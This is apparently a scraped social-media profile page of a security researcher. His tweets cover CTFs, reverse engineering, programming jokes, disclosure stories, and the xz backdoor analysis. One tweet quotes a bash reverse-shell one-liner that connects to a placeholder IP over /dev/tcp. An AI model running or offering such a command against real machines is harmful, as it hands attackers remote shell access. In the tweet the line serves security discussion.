Gynvael Coldwind
@gynvael
Followers
38,253
Following
1,295
Media
453
Statuses
6,217
security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine ⁂ @DragonSectorCTF ⁂ ⁂ ex-Google ⁂ he/him
Zürich, Switzerland
Joined July 2009
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Covid
• 871109 Tweets
Worship The Next Prince
• 573608 Tweets
TNP X ZEENUNEW
• 353191 Tweets
梅雨明け
• 184892 Tweets
黒人奴隷
• 94714 Tweets
#เจ้าสัวxอิงฟ้า
• 59582 Tweets
パワプロ
• 40461 Tweets
Halal
• 35825 Tweets
関東甲信
• 33551 Tweets
カルストンライトオ
• 31220 Tweets
Yunan
• 24860 Tweets
Botox
• 23718 Tweets
피부양자
• 20745 Tweets
#MHA428
• 17332 Tweets
Tigres
• 16559 Tweets
エビデンス
• 11274 Tweets
BRANDS AI TALK x FOURTH
• 10236 Tweets
Me coding with ~5y experience:
1. write code
Me coding with ~30y experience:
1. read docs for fopen()
2. write 1 line of code
3. check 17 different things in docs/internets about fopen
4. reverse fopen implementation because this one detail...
5. decide to use different function.
33
677
3K
Friday was my last day at Google. I'm saddened to leave behind my team of the last 12+ years, but I know Google's security is in great hands.
It's time for a short break and then I'm moving on with plans I've made long ago – my own sec research, consulting, and education company.
75
33
1K
My first program in Python! I still find this syntax a bit confusing with no { } etc.
def main(
line0: print("Hello World!"),
line1: print("What's your name?"),
line2: (x := input("Name plz: ")),
line3: print(f"Your name is: {x}")
):
pass
43
94
1K
So an AMD engineer and 2 Google engineers walk into a bar... and write an article about how "Hello World" in
#Python
works.
The article turns out to be 26 pages. From Python, through C, WinAPI/Kernel, font rendering, to GPU.
Enjoy!
12
268
912
A fun and innovative ZIP bomb by David Fifield (and an excellent technical write-up - take a look if you like file format hacks):
zbsm.zip42 kB→5.5 GB
zblg.zip10 MB→281 TB
zbxl.zip46 MB→4.5 PB
7
314
759
Python was too hard so I've switched to C++.
Here's my first "Hello World"!
My first program in Python! I still find this syntax a bit confusing with no { } etc.
def main(
line0: print("Hello World!"),
line1: print("What's your name?"),
line2: (x := input("Name plz: ")),
line3: print(f"Your name is: {x}")
):
pass
43
94
1K
22
49
760
I just randomly found a YouTube channel with 22 videos that explain modern cryptographic algorithms + show how to implement them in Python! Awesome for learning crypto!
The channel has 80 subs.
Any chance we could show some love to the creator?
Plz RT
15
219
722
Boss: Hey IT guy, can you program our pharmacy logo to flash or sth?
Bob: Say no more!
Narrator: Bob, a demoscene veteran, was waiting for this opportunity for 25 years.
One of my fav TikTok things is people discovering the insane VJ’s we employ for our pharmacies in Europe
110
4K
21K
14
126
665
TIL from
@q3k
and
@marcan42
: wget saves downloaded file's source URL (and sometimes referrer) in extended attributes.
This includes the cases where the URL has a user/password in it 🙃
$ getfattr -d -m - test
user.xdg.origin.url="
https://user:[email protected]/"
10
290
657
Random tip for Windows users:
If you are worried about accidentally double-clicking a malicious executable in your Download folder or are worried about random DLLs (carpet bombing / DLL hell), just DISABLE EXECUTION in that folder:
icacls Download /deny Everyone:(OI)(IO)(X)
11
148
534
Enjoy ⌨️
5
114
461
I think these are the two most useful posts I have on my blog (i.e. I'm referencing them in chat a lot):
FAQ: How to learn reverse-engineering?
FAQ: How to find vulnerabilities?
2
144
456
Just a daily reminder, that the C / C++ compiler is happy to remove any code it thinks doesn't make sense according to the standard.
13
75
452
If you're just starting in programming/infosec, here's a list of obvious and less obvious things you can put on your CV - a 🧵
Some of these things can be done in a week and might improve your CV.
Did I miss something? Please add to the thread.
And RT so it helps more people :)
10
158
455
Yesterday's "Breaking "DRM" in Polish trains" talk by
@dsredford
/ MrTick / q3k was one of the best investigative reverse-engineering case studies I've seen. It's a must watch.
5
122
445
That feeling when you're in a tram and the wrong texture gets loaded.
7
56
442
Service announcement:
I've got the so-called long-COVID (3 months in at this point), so currently all my projects (YouTube livestreams,
@pagedout_zine
, etc) are put on hold until I get better. Sorry!
123
14
435
A fun site with simple / entry-level hacking challenges: :)
2
111
424
Brought to you by the same school of thought as the eternal classics like:
system("cls");
and
system("pause");
6
19
394
C++ is really hard, I just tried to write Hello World! in it and it took me way too long...
26
37
373
Some notes from analyzing the bash part obfuscation of the xz/liblzma part – link leads to the part I found most interesting – it was added in 5.6.1:
3
116
343
Windows 11 is wonderful!
So I'm switching to Linux (Kubuntu) on my main PC - apologies to all hackers who had a shell on my device from the last re-install ~10-16 years ago.
Anyway, I'll use this thread to note some funny bits I notice during migration.
22
27
338
My English YT channel with security/programming livestreams just passed the 20000 subscriber mark! I'm really happy right now :)
20
21
331
<
@yyyyyyy
> congrats to Drunk Sector for finding out about their team name only 40 hours into the competition!
I don't even 🤣🤣🤣
#TrolledAtCCCCTF
#IDontEven
#Potatos
5
35
329
Call for One Page Articles for the 1st issue of Paged Out! zin!
(it's a new free experimental deeply technical zin we're starting; it's about programming/security/hacking/demoscene/retro/electronics/etc)
Details:
Story:
Please RT :)
8
218
320
Ah dealing with companies with poor security processes is always such a pleasure.
Here's Powertek threatening me with their lawyers for disclosing (patched) vulnerabilities in their PDUs:
12
24
292
An educational CTF for beginners - no ranking, no scoreboard, no stress :)
Enjoy!
Google CTF Beginners Quest 2021 is on!
?!:)
Go! Now! You have the fate of the world in your hands!
25
256
763
5
73
282
An informal review of CTF abuse (or how folks try to win CTFs in a not purely ethical way):
Know more stories like this which I've missed? Please share!
15
67
264
I've been livestreaming sec/hack/code stuff in Polish for some time now. Anyone interested in streams in English?
49
66
253
A pretty amazing opportunity to see (and compare RE methods of) 4 security youtubers/streamers as they go against an upgraded Google CTF 2018 BQ RE challenge -
Kudos to ReverseiT &
@MurmusCTF
@Zanidd
@_johnhammond
@LiveOverflow
!
4
60
252
ingredients=flour%20butter%20sugar%20egg%20salt;temperature=180;mix=1;bake=1
If Twitter can store its cookies in my browsers, I'm going to store my cookies on Twitter 😠
2
29
233
g++ -o
give me a horror story from your specialty in five words or less
19K
866
9K
7
17
234
I'm going to do a longer stream tomorrow (expected 4h) to solve all the challenges from Google's CTF Beginners Quest 2019.
There are 13 challenges, some of them having two flags.
Should be fun :)
#googlectf
4
64
226
Any ideas for Masters/Bachelors thesis topics around malware analysis, reverse engineering, low-level security or other infosec topics?
Please RT too - I get this question a lot and I always struggle to answer. So I hope to use our community's wisdom and send folks here :)
27
155
231
My new hobby:
Pinging DNS/LDAP of every log4j scan attempt I find in my logs ;)
6
12
223
Current collection of cursed operators in various programming languages (from various sources).
New submissions welcomed!
Featuring at least
#javascript
#python
#c
and
#cpp
, but most of these "work" in other languages too.
16
51
219
So it's been about a month since I switched from Windows 10 to Linux (Kubuntu) on my main workstation. Here's a 🧵with some thoughts.
If you have any hints towards the points below, or in general, do let me know :)
10
9
209
Tip of the day:
Don't encrypt your backups with SHA256.
Compression ratio might be good, but recovery is a terrible experience.
13
14
201
A really solid command-line JSON viewer for Linux I found today: - super useful when dealing with documented-as-usual-so-not-at-all JSON APIs :)
Remember to type :help to see keyboard shortcuts. And it also supports mouse in a proper way!
3
53
193
My weird php://filter/convert.iconv solution for Cool Storage System stage 2 of
@1ns0mn1h4ck
CTF Teaser:
Pretty crazy if you would have asked me ;)
7
105
192
Question: An up-to-date book for getting to know Linux Kernel (internals)?
Recommendations welcomed :)
If you have non-book resources on the topic: also welcomed!
13
33
191
New into CTFs? Full-format ranked CTFs look scary? Or just looking to have fun and learn something? Try the Beginners Quest @ Google CTF Quals :)
#GoogleCTF
2
81
187
After almost a full year I've scheduled the next livestream - Friday, 6PM CEST, Google Beginners Quest CTF 2021 - solving all tasks :)
9
26
184
In the topic of
#GoogleCTF
- I will be showing how to solve all of the Beginners Quest challenges on a special livestream tomorrow (Tue), 8pm CEST:
(recording will be available)
4
73
180
JS support in MySQL:
From a programmer's perspective: Sounds pretty useful!
From a security engineer's perspective: ↓↓↓
8
33
181
The final match of Hackceler8 (GoogleCTF Final Event) is now over!
1st + $3k. PPP (
@PlaidCTF
)
2nd + $2k. I Use Bing
3rd + $1k. pasten (
@pastenctf
)
4th + $500. TFNS (
@FlatNetworkOrg
)
Congratz!
Our experimental speed-hacking competition is now over. Videos soon! GG :)
3
25
178
In case you're wondering how block ciphers work...
(one of my viewers sent it to me; too funny not to share; in my defense, the stream wasn't about block ciphers 🙃)
3
37
176
This reminded me of when early in my career I reported a vulnerability in Starcraft map format (potential RCE) to Blizzard and in reply got advice to install an anti-virus and a firewall 🙃
Reporting vulnerabilities is an art of its own 😆
Vulnerability Disclosure:
Me: Hi, do you have a contact to discuss vulnerabilities in your product?
Them: Na fam, chill! We got this!!
🤨
25
26
563
6
19
174
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ?
Obligatory disclaimer: Asking for a friend.
14
29
168
Recording of solving all (19) challenges from
#GoogleCTF
Beginners Quest is up: (description has timestamps for all challenges + a link to the github repo with scripts/notes)
1
66
165
Our security team is hiring in Zurich/Sunnyvale/Seattle!
We're looking for security specialists interested in security code reviews of both large complex systems and smaller applications (all over the software stack - from web apps, down to even firmware).
DM me if interested.
8
60
160
A question:
Which infosec companies employ & hire folks on Vulnerability Researcher position (>50% of work time spent on vulnerability research)?
I know a few, but I'm wondering if there are more companies like that. And yes, I know it's pretty rare :)
29
29
161
Stephen from my team just published his amazing research on Spectre exploitation in JS via Browser (spoiler: yes, it's exploitable)!
Details on , but also at .
2
58
165
Oh my. Please don't ;)
A friendly reminder that you pronounce "eval" the same way as "evil".
5
16
161
Service announcement update:
Still having post COVID syndrome (9 months in at this point). All projects (YouTube livestreams,
@pagedout_zine
, etc) are still on hold. Sorry!
28
3
160
Trying to add enough cameras over my hardware desk so I could actually include it in livestreams. Progress so far includes 2 main cameras in place (overhead and microscope) and a lot of cable management on the horizon.
10
1
154
Boosting signal for folks analyzing liblzma/xz:
q3k: "I have managed to extract a list of encoded strings within the liblzma/xz backdoor payload (5.6.1)"
2
52
151
@LiveOverflow
@svblxyz
@KodyKinzie
@YouTube
Nah, our channels will be fine since we only show how to bypass INsecure computer systems ;)
On a more serious note I'll take a look when I'm back from vacation.
1
7
151
That happy feeling when you're porting a legacy script from Python 2 to Python 3 and all it takes is adding ( ) to prints ☺️
8
2
150
Congratz to
@EatSleepPwnRpt
for top1 in Geneva! Good Game, Well Played! :)
@DragonSectorCTF
finished 2nd this time (yay!), with
@p4_team
third (well done!).
Kudos to
@1ns0mn1h4ck
for making yet another great CTF :)
3
34
152
Dear Jonathan: "Accepted" means an engineer has accepted to look at your report - that's about it, nothing less, nothing more.
It does not mean your report has been considered valid - this will be decided later on and communicated in a reply.
10
7
141
Return to the basics today on stream - use-after-free class of bugs :)
When: 8pm CET
Where:
1
55
136
Absolutely amazing article on ZIP files by
@hansw2000
, with in-depth description of the compression algorithms and a step-by-step example implementation!
0
46
132
Hey folks! Since my sabbatical is over I wanted to grab this opportunity to discuss what was (Google), what will be (my next plans), and get back to livestreaming at the same time.
EN (this Tue 8PM CEST):
PL (this Wed 8PM CEST):
0
16
134
Our CTF team placed top1 @ in 2019!
That's the 3rd top1 in the history of our team, and I'm really proud of our team's accomplishments!
Kudos to our captain valis, our vice-captain
@dsredford
, all the team members and all guest players that played with us!
2019 was a great year for Dragon Sector!
🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team
🥇1st place at 2 CTFs
🥈2nd place at 5 CTFs
🥉3rd place at 5 CTFs
💻And also organized a well received Dragon CTF 2019!
10
21
314
3
4
134
def found an RCE in a terminal with ANSI escape codes - I guess '80s called and wanted their vulnerabilities back ;)
2
29
131
How to make sure no one complains about your soldering quality - tutorial:
1. Solder wires to the PCB.
2. Put a huge blob of glue on top of it.
3. ...
4. Profit?
5
6
132
This case is hilarious ;)
It's an 0-day. When SSD tried to report to
@NETGEAR
/
@Bugcrowd
, whoever handled the report seems to have ???misread the newest firmware version for R7000 as 1.3.2.134???, and the bug affects only 1.0.11.116. Problem is, 1.0.11.116 is the newest fw🙃
New advisory is now out!
The Nighthawk R7000 is a popular Netgear router, with over 50,000 positive reviews on Amazon.
Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication.
4
51
239
1
36
128
I'm in full vacation mode and I decided to play Amberstar (1992).
I played a few hours and decided the UX is, well, 1992-like. So now I'm learning AmigaOS/M68K assembly to change some things that were annoying me...
I'll be posting some curious things I find in this thread.
3
18
133
I don't like this fuzzer
0
16
131
This! The "Reverse Compilation Techniques" thesis by
@criscifuentes
was one of two main resources I've used when learning reverse engineering (the other was "Reversing: Secrets of Reverse Engineering" book). Definitely recommended reading :)
A sometimes lost fact, but the entire field of decompilation using compiler and program analysis techniques that we know as standard practice today as seen in IDA Hex Rays and Ghidra was invented by
@criscifuentes
and her thesis on the DCC decompiler in 1994.
7
64
183
0
24
129
This idea is absolutely barbaric and just gruesome. Folks, I am a vulnerability researcher. I stare at the screen the whole day looking at code. And you want me to do THIS?! The whole idea is bound to just bring pain and suffering to people.
I'm fine with the boxing part though.
@hackthebox_eu
ok, hear me out.
"Hack The Boxing". It's like Chess Boxing, but we alternate between boxing and solving a HTB machine.
I just thought up the concept, but can't claim credit for the name.
14
7
114
5
8
131
A not-so-short writeup about solving a reverse-engineering challenge using a side-channel attack:
that's from Byte Bandits CTF 2023 - gg :)
3
33
127
Finally reached 10k subs on my English YT channel! :)
Thank you for your trust! (though seriously, keep verifying what I say)
And kudos + big thx to my livestream team for helping me out:
@foxtrot_0x4fult
@KrzaQ2
@disconnect3d_pl
@masakralol
and maryush :)
3
16
128
Sometimes I can't tell the difference between a CTF task and configuring a Linux service...
2
15
128
One of my favorite things about Switzerland:
trust in society
The flower shop in the photo is closed, but the merchandise is left outside. The sign blocking the door says "if the door is closed, it's self service; scan QR-CODE to pay with TWINT".
And that's not a rare thing!
5
2
126
After a long wait we released match videos/sources of our experimental CTF-meets-speedrunning competition - Hackceler8!
BIG THANKS to the competing CTF teams and all the Hackceler8 organizers!
0
37
127
One of the projects I'm working on again this year is Google CTF, and it's finally about to happen! 1-3 July :)
There will be fun tasks :)
2
12
125